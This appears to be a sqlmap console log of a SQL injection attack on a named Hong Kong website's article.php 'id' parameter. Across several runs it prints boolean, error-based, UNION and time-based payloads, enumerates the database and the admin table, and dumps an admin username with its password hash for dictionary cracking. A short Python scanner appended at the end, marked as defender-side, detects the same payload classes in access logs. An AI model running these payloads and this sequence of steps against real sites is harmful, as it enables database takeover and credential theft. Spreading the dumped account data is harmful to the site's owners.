D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
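Added here as a defender-side illustration, not part of the original post: a small Python scanner that flags, in Apache-style access log lines, the four payload classes sqlmap reported in this session (boolean tautology, error-based via information_schema/FLOOR(RAND()), UNION SELECT, SLEEP). The log lines, the timestamps and the 203.0.113.5 client address are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One regex per injection class shown in the sqlmap output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I),
    "error-based":   re.compile(r"information_schema|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "union-query":   re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-blind":    re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

# Common Log Format: ip ident user [time] "METHOD path proto" status ...
ACCESS_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')


def classify_request(path):
    """Return the set of payload classes found in any query-string value of `path`.
    parse_qsl percent-decodes the values, so encoded spaces and '=' are matched too."""
    found = set()
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for name, rx in SIGNATURES.items():
            if rx.search(value):
                found.add(name)
    return found


def scan_log(lines):
    """Yield (client_ip, timestamp, sorted payload classes) for each request that carries a payload."""
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in Common Log Format
        ip, ts, _method, path, _status = m.groups()
        classes = classify_request(path)
        if classes:
            yield ip, ts, sorted(classes)


# Constructed sample log; the five requests mirror a benign fetch plus the four payload types.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120
203.0.113.5 - - [10/May/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120
203.0.113.5 - - [10/May/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 0
203.0.113.5 - - [10/May/2011:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 HTTP/1.1" 200 4800
203.0.113.5 - - [10/May/2011:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for ip, ts, classes in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, ts, ",".join(classes))
```

Pointed at a real access log (`scan_log(open(path))`), the same loop lists which client sent which payload class and when, which is the first thing to pull when a session like the one above is suspected.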